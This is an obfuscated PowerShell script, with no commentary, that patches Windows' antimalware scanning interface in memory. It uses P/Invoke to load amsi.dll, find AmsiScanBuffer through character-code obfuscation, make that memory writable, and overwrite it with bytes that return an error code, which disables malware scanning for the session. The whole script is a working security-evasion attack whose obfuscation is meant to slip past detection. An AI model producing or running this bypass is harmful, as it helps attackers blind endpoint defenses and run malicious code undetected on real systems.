$cgceo = @"
using System;
using System.Runtime.InteropServices;
public class cgceo {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr niixxd, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $cgceo

$idfxicj = [cgceo]::LoadLibrary("$(('äm'+'sí'+'.d'+'ll').NORMALIze([Char]([bytE]0x46)+[ChAr](111+73-73)+[CHaR](114)+[Char]([bytE]0x6d)+[ChAR]([byTe]0x44)) -replace [CHAR](92)+[chaR]([bytE]0x70)+[cHAr](63+60)+[cHAr]([BYte]0x4d)+[chAR]([byTe]0x6e)+[CHaR]([Byte]0x7d))")
$ouviji = [cgceo]::GetProcAddress($idfxicj, "$([ChAR](65*41/41)+[ChaR](9+100)+[ChAr](115)+[ChAR]([BYtE]0x69)+[CHAR]([bYtE]0x53)+[ChAr]([bYTe]0x63)+[cHAr]([bYtE]0x61)+[cHAr](110*40/40)+[ChaR](66+55-55)+[chAr](117)+[cHaR](102)+[cHAR]([BytE]0x66)+[cHAR]([BYTe]0x65)+[ChaR](103+11))")
$p = 0
[cgceo]::VirtualProtect($ouviji, [uint32]5, 0x40, [ref]$p)
$ugos = "0xB8"
$dher = "0x57"
$rbcd = "0x00"
$zsrf = "0x07"
$jqof = "0x80"
$ltff = "0xC3"
$srzcb = [Byte[]] ($ugos,$dher,$rbcd,$zsrf,+$jqof,+$ltff)
[System.Runtime.InteropServices.Marshal]::Copy($srzcb, 0, $ouviji, 6)